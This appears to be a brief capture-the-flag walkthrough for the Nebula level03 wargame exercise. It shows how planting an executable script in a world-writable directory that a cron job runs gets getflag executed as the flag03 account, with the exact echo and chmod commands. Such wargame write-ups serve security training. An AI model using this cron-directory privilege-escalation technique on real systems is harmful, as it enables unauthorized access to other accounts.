Level: https://exploit-exercises.com/nebula/level03/

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.

ls -la /home/flag03

writeable.sh executes bash -x for every file in writeable.d
writeable.d is world writeable so place our own file.

echo "getflag > /home/flag03/flag" > /home/flag03/writeable.d/test
chmod +x /home/flag03/writeable.d/test

Wait for a bit than run cat /home/flag03/flag to make sure getflag ran.

You have successfully executed getflag on a target account.